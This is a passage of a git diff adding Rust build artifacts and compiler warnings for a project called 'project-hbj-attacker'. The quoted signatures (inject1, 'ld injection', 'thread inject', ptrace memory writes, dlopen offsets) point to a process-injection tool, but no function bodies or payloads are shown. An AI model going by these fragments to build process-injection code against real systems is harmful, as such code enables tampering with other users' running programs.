\u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let i = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"aborting due to 18 previous errors; 1 warning emitted","code":null,"level":"error","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror\u001b[0m\u001b[0m\u001b[1m: aborting due to 18 previous errors; 1 warning emitted\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"For more information about this error, try `rustc --explain E0433`.","code":null,"level":"failure-note","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1mFor more information about this error, try `rustc --explain E0433`.\u001b[0m\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-206306ee5eb62a04/dep-lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-206306ee5eb62a04/dep-lib-project_hbj_attacker
new file mode 100644
index 0000000..024be49
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-206306ee5eb62a04/dep-lib-project_hbj_attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-206306ee5eb62a04/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-206306ee5eb62a04/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-206306ee5eb62a04/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-206306ee5eb62a04/lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-206306ee5eb62a04/lib-project_hbj_attacker
new file mode 100644
index 0000000..a4c929b
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-206306ee5eb62a04/lib-project_hbj_attacker
@@ -0,0 +1 @@
+b95fc939fb0c32d9
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-206306ee5eb62a04/lib-project_hbj_attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-206306ee5eb62a04/lib-project_hbj_attacker.json
new file mode 100644
index 0000000..0a21910
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-206306ee5eb62a04/lib-project_hbj_attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":1436332732506357817,"profile":17672942494452627365,"path":10763286916239946207,"deps":[[3054597201326428407,"iced_x86",false,9862943459092961479],[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021],[14034831750265444586,"ctor",false,15755893537085299923],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-206306ee5eb62a04/dep-lib-project_hbj_attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/bin-project-hbj-attacker
new file mode 100644
index 0000000..44711ae
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/bin-project-hbj-attacker
@@ -0,0 +1 @@
+9bcec90cf45eb83e
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..cded650
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":17672942494452627365,"path":4942398508502643691,"deps":[[3054597201326428407,"iced_x86",false,9862943459092961479],[5150833351789356492,"nix",false,15811409210602710039],[7883780462905440460,"libloading",false,15801149763391923402],[11499138078358568213,"libc",false,1099485397091021021],[14034831750265444586,"ctor",false,15755893537085299923],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-2278d8080922a319/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..7a6dd92
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/output-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/output-bin-project-hbj-attacker
new file mode 100644
index 0000000..58193b3
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2278d8080922a319/output-bin-project-hbj-attacker
@@ -0,0 +1,6 @@
+{"$message_type":"diagnostic","message":"value assigned to `dlopen_offset` is never read","code":{"code":"unused_assignments","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":1889,"byte_end":1902,"line_start":57,"line_end":57,"column_start":13,"column_end":26,"is_primary":true,"text":[{"text":" let mut dlopen_offset: u64 = 0;","highlight_start":13,"highlight_end":26}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"maybe it is overwritten before being read?","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"`#[warn(unused_assignments)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: value assigned to `dlopen_offset` is never read\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:57:13\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m57\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let mut dlopen_offset: u64 = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: maybe it is overwritten before being read?\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_assignments)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused variable: `seg_rw`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":4330,"byte_end":4336,"line_start":112,"line_end":112,"column_start":22,"column_end":28,"is_primary":true,"text":[{"text":"fn inject3(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // thread inject","highlight_start":22,"highlight_end":28}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/main.rs","byte_start":4330,"byte_end":4336,"line_start":112,"line_end":112,"column_start":22,"column_end":28,"is_primary":true,"text":[{"text":"fn inject3(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // thread inject","highlight_start":22,"highlight_end":28}],"label":null,"suggested_replacement":"_seg_rw","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `seg_rw`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:112:22\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m112\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn inject3(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // thread inject\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_seg_rw`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `inject1` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":434,"byte_end":441,"line_start":23,"line_end":23,"column_start":4,"column_end":11,"is_primary":true,"text":[{"text":"fn inject1(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // Simple injection","highlight_start":4,"highlight_end":11}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(dead_code)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `inject1` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:23:4\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m23\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn inject1(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // Simple injection\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(dead_code)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `inject2` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":1333,"byte_end":1340,"line_start":48,"line_end":48,"column_start":4,"column_end":11,"is_primary":true,"text":[{"text":"fn inject2(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // ld injection","highlight_start":4,"highlight_end":11}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `inject2` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:48:4\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m48\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn inject2(pid: Pid, seg_rw: (u64, u64), regs: user_regs_struct) -> Result<(), Box> // ld injection\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `module_base_address` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/map.rs","byte_start":1290,"byte_end":1309,"line_start":49,"line_end":49,"column_start":8,"column_end":27,"is_primary":true,"text":[{"text":"pub fn module_base_address(range_strings: &Vec<&str>, module_name: &str) -> Option {","highlight_start":8,"highlight_end":27}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `module_base_address` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/map.rs:49:8\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m49\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub fn module_base_address(range_strings: &Vec<&str>, module_name: &str) -> Option {\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"5 warnings emitted","code":null,"level":"warning","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: 5 warnings emitted\u001b[0m\n\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-23ee938670df2767/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-23ee938670df2767/bin-project-hbj-attacker
new file mode 100644
index 0000000..24a2014
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-23ee938670df2767/bin-project-hbj-attacker
@@ -0,0 +1 @@
+69f5ca4e1e0cf4da
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-23ee938670df2767/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-23ee938670df2767/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..94df49c
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-23ee938670df2767/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":8731458305071235362,"path":4942398508502643691,"deps":[[3054597201326428407,"iced_x86",false,16851255346335658477],[5150833351789356492,"nix",false,1524876878938899937],[11499138078358568213,"libc",false,6911773660789407732],[14034831750265444586,"ctor",false,13205310156866713074],[17285295483919976612,"dynasmrt",false,16634940951051159224]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-23ee938670df2767/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-23ee938670df2767/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-23ee938670df2767/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..5b28ec6
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-23ee938670df2767/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-23ee938670df2767/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-23ee938670df2767/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-23ee938670df2767/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/bin-project-hbj-attacker
new file mode 100644
index 0000000..613b0dd
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/bin-project-hbj-attacker
@@ -0,0 +1 @@
+5c918f42164a609f
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..63a221d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":8731458305071235362,"path":4942398508502643691,"deps":[[5150833351789356492,"nix",false,1524876878938899937],[11499138078358568213,"libc",false,6911773660789407732]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..808219b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/output-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/output-bin-project-hbj-attacker
new file mode 100644
index 0000000..457216e
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-2551d0c3b2f656cb/output-bin-project-hbj-attacker
@@ -0,0 +1,5 @@
+{"$message_type":"diagnostic","message":"unused import: `processes::write_memory_vm`","code":{"code":"unused_imports","explanation":null},"level":"warning","spans":[{"file_name":"src/helper.rs","byte_start":138,"byte_end":164,"line_start":7,"line_end":7,"column_start":9,"column_end":35,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":9,"highlight_end":35}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_imports)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"remove the whole `use` item","code":null,"level":"help","spans":[{"file_name":"src/helper.rs","byte_start":130,"byte_end":166,"line_start":7,"line_end":8,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":1,"highlight_end":36},{"text":"pub use processes::write_memory_ptrace;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"","suggestion_applicability":"MachineApplicable","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused import: `processes::write_memory_vm`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper.rs:7:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m7\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub use processes::write_memory_vm;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_imports)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused variable: `i`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"_i","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:43:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m43\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let i = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `sys_write_test` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":203,"byte_end":217,"line_start":14,"line_end":14,"column_start":4,"column_end":18,"is_primary":true,"text":[{"text":"fn sys_write_test()","highlight_start":4,"highlight_end":18}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(dead_code)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `sys_write_test` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:14:4\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m14\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn sys_write_test()\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(dead_code)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `write_memory_vm` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1757,"byte_end":1772,"line_start":68,"line_end":68,"column_start":8,"column_end":23,"is_primary":true,"text":[{"text":"pub fn write_memory_vm(pid: Pid, mut start_addr: usize, mut data: &[u8]) -> Result> {","highlight_start":8,"highlight_end":23}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `write_memory_vm` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:68:8\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m68\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub fn write_memory_vm(pid: Pid, mut start_addr: usize, mut data: &[u8]) -> Result> {\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"4 warnings emitted","code":null,"level":"warning","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: 4 warnings emitted\u001b[0m\n\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-28644bcd824d9d0c/dep-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-28644bcd824d9d0c/dep-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..5c54f74
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-28644bcd824d9d0c/dep-test-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-28644bcd824d9d0c/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-28644bcd824d9d0c/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
